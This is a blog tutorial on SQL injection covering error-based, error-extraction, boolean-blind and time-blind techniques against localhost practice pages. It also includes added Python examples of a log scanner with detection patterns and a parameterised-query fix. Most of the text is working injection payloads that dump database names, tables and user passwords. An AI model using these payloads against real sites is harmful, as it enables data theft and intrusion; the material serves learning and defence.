SQL INJECTION — The Coolest Vulnerability

gif from shahjerry33.medium.com

Hello everyone, in this blog we are going to learn all about SQL injection. I'm very excited to write this blog because this is one of my favourite vulnerabilities among the injection attacks. We will cover what SQL injection is, the types of SQL injection, the techniques used to perform a SQL injection attack, how to prevent your sites from SQL injection, and much more, with suitable examples and payloads. Let's start…

:::::: ATTACKING ON ANY SITE WITHOUT PERMISSION IS ILLEGAL ::::::

SQL Injection (sqli) :-

As we know, in the OWASP (Open Web Application Security Project) Top 10 the Injection attack has held the first position (A1) since 2010 and still remains there. SQL injection is a type of injection attack in which the attacker injects malicious SQL queries via the URL or via any input box in order to get private or confidential information from the target's database. This private and confidential information includes admin IDs and passwords, bank details, identity details, trade secrets, government secrets and so on. If such information is leaked there are many threats to the organisation, like loss of revenue, loss of reputation, loss of privacy etc. It works on vulnerable web pages and apps that use a backend database like MySQL, Oracle and MSSQL. Through a SQL injection vulnerability the attacker is also able to perform operations such as delete, update, modify and insert.

Understand SQL injection with an example :-

SQL injection is not a vulnerability of any particular software or server; it is a vulnerability of the code, which arises whenever unsanitised input is used in a query.

Types of SQL injection :-

There are mainly three types of SQL injection :

  1. Error Based SQL Injection
  2. Union Based SQL Injection
  3. Blind SQL Injection

Blind injection is further divided into two types :

  1. Boolean Based SQL Injection
  2. Time Based SQL Injection

[1] ERROR BASED SQL INJECTION :-

When the attacker gives arbitrary input via the URL or an input box in order to run a malicious query, the database generates some kind of error if the query does not work properly. From this error the attacker learns the structure of the query or database as defined by the developer, and then reconstructs the query according to the errors until it is in working condition. Because errors are shown in this vulnerability, it is known as Error Based SQL Injection.

Perform Attack :-

The attack is performed in the following 4 steps —

  1. Break the query.
  2. Join the query.
  3. Find the number of columns.
  4. Run a second select query and find the place in the output where we get the database name, table names, column names and the data from the columns.

STEP — 1

Break the query :-

The term "break the query" means generating errors by giving arbitrary input. In this step the attacker identifies how the query is written, in order to be able to execute the malicious query.

Following are the ways to break the query :-

Examples and payload of query break :-

Requirement :-

Firstly you have to create a file and a database to practise this.

Creating Database :-

I assume that you know MySQL and are able to create a database. If you can't, you have to learn MySQL first so that you are able to understand this properly.

content :-

In the above example the id parameter is in single quotes, so in this example our query is broken with a single quote.

http://localhost/error-based-injection-1.php?id=1

With this URL you get the username and password of the first user.

  1. Single Quote:-

Payload :-

http://localhost/error-based-injection-1.php?id=1'

In this way we can break the query.

2. Single Quote with Bracket :-

$query = "SELECT * from users where id=('$id') LIMIT 0,1";

Payload:- http://localhost/error-based-injection-1.php?id=1')

3. Brackets :-

$query = "SELECT * from users where id=($id) LIMIT 0,1";

Payload:- http://localhost/error-based-injection-1.php?id=1)

4. Double Quotes with Bracket :-

$id = '"' . $id . '"';
$query = "SELECT * from users where id=($id) LIMIT 0,1";

Payload:- http://localhost/error-based-injection-1.php?id=1")

5. Nothing to do :-

$query = "SELECT * from users where id=$id LIMIT 0,1";

Payload:- http://localhost/error-based-injection-1.php?id=1

STEP — 2

Join the query :-

Joining the query means completing the broken query so that the malicious query runs without any error.

Following are some ways to join the query :-

Payloads :-

Payload:- http://localhost/error-based-injection-1.php?id=1'--+

Payload:- http://localhost/error-based-injection-1.php?id=1'--%20

Payload:- http://localhost/error-based-injection-1.php?id=1' %23

Payload:- http://localhost/error-based-injection-1.php?id=1' or 1 = '1

Payload:- http://localhost/error-based-injection-1.php?id=1' or '1

In this way we can join the query.

STEP — 3

Find the Number of Columns :-

Payload:- http://localhost/error-based-injection-1.php?id=1' order by 1,2,3 --+

Payload:- http://localhost/error-based-injection-1.php?id=1' order by 1,2,3,4--+

Here (with order by 4) we get an error, so the query has only 3 columns.

STEP — 4

Run a second select query and find the place in the output where we get the data :-

Payload:- http://localhost/error-based-injection-1.php?id=1' union all select 1,2,3--+

  1. Find Database Name :-

Function :- database( )

Payload :-

http://localhost/error-based-injection-1.php?id=1' union all select 1,database(),3--+

We get the database name in place of the second column.

2. Find Username :-

Function :- current_user( )

Payload :-

http://localhost/error-based-injection-1.php?id=1' union all select 1,current_user(),3--+

We get the username.

3. Find Table Name :-

— Now we use the information schema to find out all the information.

Payload -1 :- Get the table names one by one.

http://localhost/error-based-injection-1.php?id=1' union all select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1--+

Payload -2 :- Get all the table names at once.

http://localhost/error-based-injection-1.php?id=1' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

4. Find Column Name :-

We find out the column names from the users table.

Payload :- 1

http://localhost/error-based-injection-1.php?id=1' union all select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

Payload :- 2

http://localhost/error-based-injection-1.php?id=1' union all select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name='users' limit 1,1--+

5. Extract Data :-

Payload :- 1

http://localhost/error-based-injection-1.php?id=1' union all select group_concat(id),group_concat(username),group_concat(password) from users--+

Payload :- 2

http://localhost/error-based-injection-1.php?id=1' union all select id,username,password from users --+

[2] UNION BASED INJECTION :-

image by :- security Idiots !!

In this injection we get data on the screen, but that data is constant, not from the database: it always looks the same and never gives any errors. If we break the query it gives us a blank page, and when we join the query the same data is shown on the screen again. So in this case we have to generate an error ourselves, and in that error we get all our data.

Code of this file :-

file name :- union-based-injection.php

Payloads :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a , floor(rand()*2))a from information_schema.tables group by a)b)--+

You will get the database name between ::: :::; if you don't get it, refresh again and again.

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select current_user()),0x3a,0x3a , floor(rand()*2))a from information_schema.tables group by a)b)--+

You will get the user name between ::: :::; if you don't get it, refresh again and again.

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

— You will get the first table name from this; now we have to increase the limit and find out all the table names.

— We will get the table name between the ::: :::; if you don't get it, refresh again and again.

Let's suppose we get the table name users from the above step.

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='user' and table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

— You will get the first column name from this; now we have to increase the limit and find out all the column names from the table user.

— We will get the column name between the ::: :::; if you don't get it, refresh again and again.

Let's say we have the column names — id, name, username, password.

Payload for id :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select id from user limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

Payload for name :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select name from user limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

Payload for username :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select username from user limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

Payload for password :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select password from user limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

— In this way we can get the whole data from the first row.

— For the data of the second row, change the limit from 0,1 to 1,1 and repeat the same steps as above.

[3] Blind Injection :-

image by :- digitalmunition

Its name says everything about this injection: here "blind" means no errors. We are unable to see any errors, and we are also unable to generate an error as in union based injection, so in this case we use blind SQL injection. This injection gives us answers in yes and no: we ask the site whether the database name is less than 5 characters; if yes, it shows the content of the page normally, and if no, something is missing from the content of the page. It seems as if the database is talking to us, and this is a wonderful vulnerability.

Blind SQL injection is further divided into two types :-

  1. Boolean Based Sql injection
  2. Time Based Sql injection

BOOLEAN BASED SQL INJECTION :-

In this SQL injection we ask the database a yes-or-no question and the database also answers in yes or no; this is the functionality of the database. Such conditions occur whenever the error handling of the database is not working properly. Every site has many vulnerabilities no matter how secure it is; there is always a threat of hacking hanging over every site and server, and it all depends on the skills and techniques of the hacker. Most sites are affected by blind SQL injection and XSS injection attacks.

In Boolean Based injection we talk to the database in numbers, characters and also through the ASCII values of signs, symbols and characters.

Following are some example payloads for boolean based blind SQL injection :-

Payload :- 1

http://localhost/boolean-based-injection.php?id=1' AND (select length(database()) > 5)--+

http://localhost/boolean-based-injection.php?id=1' AND (select length(database()) < 6)--+

http://localhost/boolean-based-injection.php?id=1' AND (select length(database()) = 5)--+

http://localhost/boolean-based-injection.php?id=1' AND (select ascii(substr(database(),1,1)) < 110 )--+

http://localhost/boolean-based-injection.php?id=1' AND (select ascii(substr(database(),1,1)) = 108 )--+

http://localhost/boolean-based-injection.php?id=1' AND (select ascii(substr(database(),2,1)) >108 )--+

— Increase the substr position from 1,1 to 2,1, 3,1 …

— Here characters are checked by their ASCII value.

http://localhost/boolean-based-injection.php?id=1' AND ( select length(table_name) from information_schema.tables where table_schema=database() limit 0,1) = 3--+

http://localhost/boolean-based-injection.php?id=1' AND ( select length(table_name) from information_schema.tables where table_schema=database() limit 1,1) < 5--+

http://localhost/boolean-based-injection.php?id=1' AND ( select length(table_name) from information_schema.tables where table_schema=database() limit 0,1) > 10--+

— Increase the limit from 1,1 to 2,1, 3,1 …

— In this way we can find both the number of tables present in the database and the length of each table name.

http://localhost/boolean-based-injection.php?id=1' AND ( select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1) > 105--+

http://localhost/boolean-based-injection.php?id=1' AND ( select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 1,1) = 103--+

— Increase both the substr position and the limit from 1,1 to 2,1, 3,1 …

— In this way we can extract all the data.

— The disadvantage of this is that it takes a lot of time to perform this injection manually; that's why we use automated tools like sqlmap or Python scripts.

TIME BASED SQL INJECTION :-

In this injection we identify the answers from the site by making it sleep for some specific time, like 10 or 5 seconds, to find out whether our guess is correct or not. If our guess is correct the site sleeps for the defined time, and if the guess is wrong the site does not sleep. In this way this injection also makes the database talkative.

Following are some example payloads for time based blind SQL injection :-

select if((select database())='sqli',sleep(10),null);

select if((select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)=6,sleep(10),null);

select if((select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 0,1)=115,sleep(10),null);

— In this way we can find all the data from the database.
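From the defender's side, every payload shape shown in the sections above leaves a recognisable trace in the web server's access log. The following is an added example, not code from the original post: a small Python scanner that URL-decodes each request's query string and tags the error-based, union-based, boolean-blind and time-blind patterns, plus the two signals a payload cannot hide (a 500 after a quote, and an abnormally slow response for sleep()). The log lines, rule names and thresholds are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post); the query strings follow
# the post's payload shapes. The last field is the response time in seconds.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /error-based-injection-1.php?id=1 HTTP/1.1" 200 512 0.012
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /error-based-injection-1.php?id=1' HTTP/1.1" 500 210 0.010
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /error-based-injection-1.php?id=1'%20order%20by%204--+ HTTP/1.1" 500 210 0.011
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /error-based-injection-1.php?id=1'%20union%20all%20select%201,database(),3--+ HTTP/1.1" 200 530 0.013
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /boolean-based-injection.php?id=1'%20AND%20(select%20ascii(substr(database(),1,1))%20=%20108%20)--+ HTTP/1.1" 200 512 0.012
10.0.0.5 - - [01/Jan/2024:10:00:16 +0000] "GET /boolean-based-injection.php?id=1'%20AND%20if((select%20database())='sqli',sleep(10),null)--+ HTTP/1.1" 200 512 10.004
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) \S+" '
                    r'(?P<status>\d{3}) \S+ (?P<secs>[\d.]+)$')

# Heuristic rules (an assumption of this example), applied to the decoded, lower-cased query.
RULES = [
    ("comment_terminator", re.compile(r"--(\s|$)|'\s*#")),                 # 1'--+  or  1' %23
    ("column_count",       re.compile(r"\border\s+by\s+\d")),               # step 3: order by N
    ("union_select",       re.compile(r"\bunion\s+(all\s+)?select\b")),     # step 4
    ("schema_probe",       re.compile(r"information_schema\.|\bdatabase\(\)|current_user\(\)")),
    ("blind_boolean",      re.compile(r"ascii\s*\(\s*substr|\blength\s*\(")),
    ("blind_time",         re.compile(r"\bsleep\s*\(\s*\d+")),
    ("dup_key_error",      re.compile(r"floor\s*\(\s*rand\s*\(\)\s*\*\s*\d")),  # union-based trick
]

def analyse_line(line, slow_threshold=5.0):
    """Return (ip, path, tags) for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("url").partition("?")
    # Decode twice: %20 and '+' both mean space here, and double encoding is common.
    decoded = unquote_plus(unquote_plus(query)).lower()
    tags = [name for name, pat in RULES if pat.search(decoded)]
    if float(m.group("secs")) >= slow_threshold:
        tags.append("slow_response")        # time-based probes stand out by latency
    if m.group("status") == "500" and ("'" in decoded or '"' in decoded):
        tags.append("quote_then_error")     # step 1: a quote that broke the query
    return m.group("ip"), path, tags

def scan(log_text, slow_threshold=5.0):
    """Return only the suspicious requests as (ip, path, tags) tuples."""
    recs = (analyse_line(l, slow_threshold) for l in log_text.splitlines())
    return [r for r in recs if r and r[2]]
```

Run `scan(SAMPLE_LOG)` to see the five probing requests tagged while the plain `id=1` request is ignored; the same one source IP walking through the steps in order is itself a strong signal worth alerting on.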

[*] PREVENTION FROM THE SQL INJECTION
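The root cause named at the start of the post is unsanitised input pasted into the query text, so the fix is to keep the value out of the SQL text altogether. As an added example (not the post's own code), the following Python uses an in-memory SQLite table standing in for the post's PHP/MySQL users table to show the post's step-4 union payload leaking every row from the concatenated query, while the parameterised version returns nothing; the table contents and the parse_id allow-list check are constructed for this example.

```python
import sqlite3

def make_db():
    """Constructed in-memory practice table with the post's users(id, username, password) layout."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")])
    return con

def lookup_vulnerable(con, user_id):
    """Mirrors the post's PHP: $query = "SELECT * from users where id='$id' LIMIT 0,1";
    The raw parameter is pasted into the SQL text, so a quote closes the string literal
    and everything after it is parsed as SQL (a lone quote raises the step-1 error)."""
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 0,1"
    return con.execute(sql).fetchall()

def lookup_safe(con, user_id):
    """Parameterised version: the value travels separately from the SQL text, so it can
    only ever be compared against id and can never change the query's structure."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return con.execute(sql, (user_id,)).fetchall()

def parse_id(raw):
    """Allow-list check for the id parameter before it reaches the database at all."""
    if not raw.isdigit():
        raise ValueError("id must be a positive integer")
    return int(raw)

if __name__ == "__main__":
    con = make_db()
    # The post's step-4 payload; its trailing '--' comments out the " LIMIT 0,1".
    payload = "1' union all select id,username,password from users--"
    print(lookup_vulnerable(con, payload))   # every row leaks
    print(lookup_safe(con, payload))         # no row matches
```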

Thank you for reading this blog.

If you have any doubt regarding this, feel free to contact me.

You can follow me on LinkedIn and Twitter.

Linkedin :- https://www.linkedin.com/in/dheeraj-deshmukh-65b7901a4/

Twitter :- https://twitter.com/dheeraj_deshmuk
